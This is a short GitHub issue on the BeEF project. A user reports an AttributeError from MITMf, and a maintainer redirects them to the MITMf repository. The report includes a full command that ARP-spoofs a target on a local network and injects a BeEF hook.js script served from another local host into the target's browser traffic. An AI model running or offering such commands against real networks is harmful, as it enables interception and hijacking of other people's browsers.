### ISSUE TITLE
Beef working with MITMf, but getting error "AttributeError: ClientRequest instance has no attribute 'headers'"

### ISSUE THREAD

**Issue by minijus704** [beefproject/beef#1277]
When i run
./mitmf.py -i wlan0 --spoof --arp --gateway 192.168.0.1 --target 192.168.0.101 --inject --js-url http://192.168.0.102:3000/hook.js
mitmf trying inject browser, but  getting error "AttributeError: ClientRequest instance has no attribute 'headers'"
Where problem?

Verify first that your issue/request has not been posted previously:

* https://github.com/beefproject/beef/issues
* https://github.com/beefproject/beef/wiki/FAQ

Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.0).

#### Environment

What version/revision of BeEF are you using?

On what version of Ruby?

On what browser?

On what operating system?

#### Configuration

Are you using a non-default configuration?

Have you enabled or disabled any BeEF extensions?

#### Summary

Please provide a summary of the issue.

#### Expected Behaviour

What was the expected result?

#### Actual Behaviour

What was the actual result?

#### Steps to Reproduce

Please provide steps to reproduce this issue.

#### Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots.

**Comment by antisnatchor** [comment]
You should open the issue on the https://github.com/byt3bl33d3r/MITMf Git repo, not here.
